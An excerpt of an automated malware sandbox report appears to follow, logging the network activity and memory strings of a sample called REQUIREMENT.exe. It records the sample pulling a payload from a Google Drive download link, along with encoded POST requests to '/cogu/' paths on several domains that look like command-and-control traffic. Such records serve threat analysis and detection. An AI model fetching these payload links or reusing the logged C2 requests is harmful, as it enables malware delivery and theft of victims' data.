Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:53:28 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.15.7Date: Wed, 13 Oct 2021 13:54:40 GMTContent-Length: 0Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: systray.exe, 0000000D.00000002.37540180980.00000000054BC000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190974441.00000000281F2000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: systray.exe, 0000000D.00000002.37540180980.00000000054BC000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190974441.00000000281F2000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: systray.exe, 0000000D.00000002.37540180980.00000000054BC000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190974441.00000000281F2000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)

Source: REQUIREMENT.exe, 00000003.00000003.32856917078.00000000009AD000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: REQUIREMENT.exe, 00000003.00000003.32856917078.00000000009AD000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000009.00000000.33253954243.0000000010CE2000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000009.00000000.32873311751.0000000009C27000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.32984707451.000000000DAE0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000009.00000000.33253954243.0000000010CE2000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000009.00000000.32882465556.000000000D5C5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000009.00000000.33253954243.0000000010CE2000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000009.00000000.33236468939.000000000A470000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: http://www.foreca.com
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35639235210.00000000008BC000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=
Source: systray.exe, 0000000D.00000002.37540352224.00000000056AB000.00000004.00020000.sdmp	String found in binary or memory: http://www.shopsharpgraphics.com
Source: systray.exe, 0000000D.00000002.37540352224.00000000056AB000.00000004.00020000.sdmp	String found in binary or memory: http://www.shopsharpgraphics.com/cogu/
Source: systray.exe, 0000000D.00000002.37539627318.0000000004FB1000.00000004.00020000.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com
Source: systray.exe, 0000000D.00000002.37539627318.0000000004FB1000.00000004.00020000.sdmp, systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com/cogu/
Source: systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com/cogu/6
Source: systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com/cogu/L
Source: systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com/cogu/W
Source: explorer.exe, 00000009.00000000.32873311751.0000000009C27000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000000.32935207823.000000000DA12000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.32981600258.000000000D73F000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000000.32873311751.0000000009C27000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000009.00000000.32912002579.0000000003840000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.32960963576.00000000038A0000.00000004.00000001.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
Source: explorer.exe, 00000009.00000000.32942173512.00000000112AB000.00000004.00000001.sdmp	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: REQUIREMENT.exe, 00000003.00000003.32850629558.00000000009AD000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35629055759.00000000008C3000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000003.35765451123.00000000008F4000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: certmgr3ff.exe, 0000001A.00000003.35641309479.00000000008A9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/%%doc-04-7g-docs.googleusercontent.com
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/3
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/S
Source: REQUIREMENT.exe, 00000003.00000003.32857517475.0000000000997000.00000004.00000001.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/W
Source: REQUIREMENT.exe, 00000003.00000003.32850629558.00000000009AD000.00000004.00000001.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/t
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000003.35770188314.00000000008F4000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35818787239.0000000000818000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/
Source: certmgr3ff.exe, 0000001C.00000002.35818481696.00000000007D8000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/%%doc-0o-60-docs.googleusercontent.com
Source: certmgr3ff.exe, 0000001B.00000002.35778164393.000000000088A000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001C.00000002.35818787239.0000000000818000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/-
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/b
Source: certmgr3ff.exe, 0000001A.00000003.35628787904.00000000008B5000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/docs/secure
Source: certmgr3ff.exe, 0000001B.00000003.35765451123.00000000008F4000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcj
Source: certmgr3ff.exe, 0000001B.00000003.35770188314.00000000008F4000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/uT
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/
Source: certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/Gql
Source: certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/com_q
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/k
Source: certmgr3ff.exe, 0000001A.00000003.35633000839.00000000008C3000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleuserco
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/osoft
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/cA
Source: certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/ertificates
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/f
Source: certmgr3ff.exe, 0000001C.00000002.35818481696.00000000007D8000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13
Source: REQUIREMENT.exe, 00000003.00000003.32850629558.00000000009AD000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13CEplGBbrpSmmZ_Evs
Source: certmgr3ff.exe, 0000001A.00000003.35629055759.00000000008C3000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13om
Source: certmgr3ff.exe, 0000001C.00000002.35818883054.0000000000826000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13t
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13xw
Source: explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000009.00000000.32941779484.00000000111A2000.00000004.00000001.sdmp	String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: DB1.17.dr	String found in binary or memory: https://login.live.com/
Source: systray.exe, 0000000D.00000002.37530371735.0000000002AA7000.00000004.00000020.sdmp, DB1.17.dr	String found in binary or memory: https://login.live.com//
Source: DB1.17.dr	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: systray.exe, 0000000D.00000002.37530371735.0000000002AA7000.00000004.00000020.sdmp, DB1.17.dr	String found in binary or memory: https://login.live.com/v104
Source: explorer.exe, 00000009.00000000.32893898674.0000000010F10000.00000004.00000001.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000009.00000000.32882465556.000000000D5C5000.00000004.00000001.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	String found in binary or memory: https://word.office.comcaS
Source: explorer.exe, 00000009.00000000.33223566168.0000000003925000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000000.32942173512.00000000112AB000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000009.00000000.32873010204.0000000009BDF000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehpLMEM
Source: explorer.exe, 00000009.00000000.32942173512.00000000112AB000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.nazfoodstuff.com
Source: systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png

Source: unknown

HTTP traffic detected: POST /cogu/ HTTP/1.1Host: www.tpmionline.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.tpmionline.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tpmionline.com/cogu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 36 3d 66 37 4e 43 71 33 70 65 49 4f 6c 69 50 33 6e 34 71 78 5a 6b 64 6f 59 35 48 64 4a 72 38 69 42 4f 53 4e 4b 6b 37 4b 7e 67 59 5f 71 59 6e 6b 44 51 6f 2d 44 63 45 5f 47 6d 73 79 42 70 63 33 6e 43 45 59 73 58 4c 66 50 73 73 4f 41 68 65 53 58 32 4e 54 71 69 31 50 37 4d 44 65 6e 63 7e 69 41 69 31 50 61 57 69 65 42 39 58 51 7e 54 71 68 6c 46 55 4f 74 37 33 59 76 4b 30 4d 62 4e 43 6b 45 79 6a 4a 6c 36 7e 38 75 42 37 34 65 4f 52 6e 59 30 46 4d 58 5f 44 50 69 68 55 78 63 6a 6b 49 6f 57 7e 72 6d 31 47 57 75 62 51 70 42 42 45 7a 64 72 7a 67 4a 5f 37 62 6e 43 58 53 69 4e 4a 36 76 71 39 61 39 59 31 4e 31 63 59 56 7e 65 72 4d 30 74 28 54 36 57 45 6d 6e 4b 49 2d 6b 56 36 64 53 49 78 4f 53 46 54 48 55 4e 42 54 6a 38 6e 6d 77 44 32 72 46 63 34 53 57 44 33 6f 38 57 72 35 72 69 34 74 43 62 31 6c 56 38 72 52 6e 5f 30 47 77 65 6e 41 68 5a 42 71 6d 76 47 36 6d 4c 64 58 6c 71 53 69 77 52 54 4f 75 39 65 76 50 39 4d 74 5a 59 30 45 72 4a 64 53 45 32 44 45 43 59 54 74 64 48 71 41 49 41 37 77 5a 48 34 46 33 47 79 71 44 30 52 62 4a 4d 33 6d 61 56 33 4d 54 76 4c 44 47 4c 41 70 6a 47 6f 63 59 50 4a 2d 67 6a 52 4c 59 5f 70 35 46 51 28 5a 30 4f 59 33 34 38 68 41 56 53 55 37 63 77 30 48 71 70 56 44 5a 31 4c 5f 45 34 6a 76 53 4d 6c 4d 68 64 70 30 6d 6f 6f 4c 43 56 31 39 36 38 78 78 59 39 4d 55 28 46 58 78 7e 56 42 6c 39 4e 64 49 6c 6e 42 58 6e 7a 30 6f 58 68 62 79 4a 6e 44 76 66 77 72 72 37 78 6f 63 47 41 71 39 53 67 37 2d 5a 78 73 41 57 6d 28 56 6a 48 49 55 37 30 75 56 6a 39 48 53 7e 59 32 31 64 48 67 64 45 61 39 56 34 61 58 58 39 44 6c 43 63 58 46 69 38 35 4d 32 38 6a 4f 45 72 4f 44 72 52 39 4b 4d 49 55 47 32 45 4a 31 77 72 39 58 42 46 58 58 4d 7e 37 6e 63 36 53 7e 6f 53 39 45 5a 65 74 47 39 6c 31 33 31 5a 55 71 65 44 43 42 65 39 56 74 54 36 75 75 66 41 78 66 78 52 34 51 73 65 31 42 45 66 6b 56 47 51 62 4d 54 75 78 6c 59 6d 5f 71 59 44 4b 36 51 33 76 7e 35 5a 37 38 4d 39 51 4f 5a 36 7a 4e 2d 47 37 4a 78 71 59 44 6e 75 73 77 4d 42 37 37 58 69 41 57 74 78 71 47 31 74 6b 6e 72 69 45 58 4b 77 39 6c 50 61 34 69 66 6f 68 69 4f 45 67 6f 35 6e 4a 51 52 5a 57 70 43 4f 32 6c 70 70 63 47 4a 75 61 49 41 66 6a 57 78 43 50 75 4b 31 73 5a 4d 4f 47 65 39 53 75 4f 7a 37 4a 50 58 48 4f 74 74 77 6a 43 52 50 74 37 44 46 75 28 47 59 49 4d 34 32 68 68 66 36 2d 64 75 36 6e 7e 4a 78 47 32 79 70 66 61 6a 48 30 34 36 75 49 63 7a 64 57 7a 54 4e 70 4f 78 61 69 48 4e 41 58 67 38 47 68 6a 70 41 6f 28 5a 73 35 28 6c 31 73 4a 72 6a 67 4f 76 50 31 39 63 76 50 59 50 34 32 61 43 59 59 51 32 57 78 62 33 67 48 47 37 46 31 70 77 4b 33 71 50 67 35 64 6e 7a 55 59 7a 76 72 57 73 7e 6e 7a 57 50 69 67 4e 68 56 46

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra59sspsgplogf893q75230rnc/1634132775000/18281895610876391208/*/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-7g-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
Source: global traffic	HTTP traffic detected: GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-60-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e%3Ddownload&hash=ne1ffd4kaaa27pue6e32mldfstfdqasf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
Source: global traffic	HTTP traffic detected: GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download&nonce=r167qul5841hi&user=04225796272126474013Z&hash=htm37s8j60l12inv0q761u8k5rdo7ceb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0o-60-docs.googleusercontent.comCookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9_nonce=r167qul5841hi
